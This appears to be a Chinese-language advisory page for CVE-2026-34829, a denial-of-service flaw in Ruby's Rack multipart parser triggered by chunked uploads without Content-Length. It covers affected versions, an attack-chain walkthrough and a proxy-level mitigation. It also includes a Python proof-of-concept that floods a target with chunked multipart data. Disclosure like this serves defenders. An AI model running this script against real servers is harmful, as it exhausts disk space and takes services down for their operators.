CVE-2026-34829 CVSS 7.5 高危

CVE-2026-34829 Rack拒绝服务漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34829

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Rack

漏洞概述

Rack是一个模块化Ruby Web服务器接口。在2.2.23、3.1.21和3.2.6版本之前，Rack::Multipart::Parser仅在存在CONTENT_LENGTH时才将请求体包装在BoundedIO。当使用HTTP分块传输编码且不带Content-Length头发送multipart请求时，解析将持续到流结束且无总大小限制。攻击者可利用此漏洞上传任意大文件，消耗无限制磁盘空间，导致Rack应用拒绝服务。

技术细节

该漏洞主要影响Rack库的Multipart解析组件。在受影响版本中，Rack::Multipart::Parser仅当请求头中包含CONTENT_LENGTH时，才会将请求体包装在BoundedIO对象中以实施大小限制。如果攻击者发送使用HTTP分块传输编码且不包含Content-Length头的请求，解析器将无法确定上传数据的总大小，从而不再限制数据量。在此过程中，上传的文件内容会被直接流式写入磁盘的临时文件，不再受限于内存缓冲区的大小。这使得未经身份验证的远程攻击者能够通过发送特制的恶意请求，向服务器持续传输数据，消耗无限的磁盘空间，最终导致服务器因磁盘空间耗尽而崩溃或拒绝服务。根据CVSS v3.1评分，该漏洞评分为7.5分，属于高危漏洞，攻击复杂度低，无需用户交互即可利用。

攻击链分析

STEP 1

侦察与探测

攻击者识别目标是否使用了受影响版本的Rack中间件，并确认其接受multipart/form-data请求。

STEP 2

构造恶意请求

攻击者编写脚本，使用HTTP分块传输编码发送multipart/form-data请求，并故意移除Content-Length头部。

STEP 3

执行攻击

向目标服务器持续发送包含大量数据的分块数据包，利用解析器未限制总大小的缺陷。

STEP 4

资源耗尽

服务器不断接收数据并直接写入磁盘临时文件，导致磁盘空间被无限占用。

STEP 5

拒绝服务

由于磁盘空间耗尽，应用程序无法写入日志或创建临时文件，最终导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import time

def send_chunked_attack(host, port, path):
    # Create a raw socket to send HTTP request without Content-Length
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    
    # Construct the HTTP headers using chunked transfer encoding
    payload = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\r\n"
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
    )
    s.send(payload.encode())
    
    # Send data in chunks to simulate arbitrary large file upload
    chunk_size = 4096
    chunk_data = b"A" * chunk_size
    # This loop simulates sending a massive file
    for i in range(100000): 
        chunk_header = f"{hex(chunk_size)[2:]}\r\n".encode()
        s.send(chunk_header + chunk_data + b"\r\n")
        # print(f"Sent chunk {i}")
        
    # Send the terminating chunk
    s.send(b"0\r\n\r\n")
    response = s.recv(1024)
    print(response)
    s.close()

# Usage example (Replace with actual target details for testing)
# send_chunked_attack("127.0.0.1", 8080, "/upload")

影响范围

Rack < 2.2.23

Rack >= 3.0.0, < 3.1.21

Rack >= 3.2.0, < 3.2.6

防御指南

临时缓解措施

如果无法立即升级，建议在应用防火墙或反向代理层面限制请求体的最大大小和超时时间，以阻断恶意的分块传输攻击。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表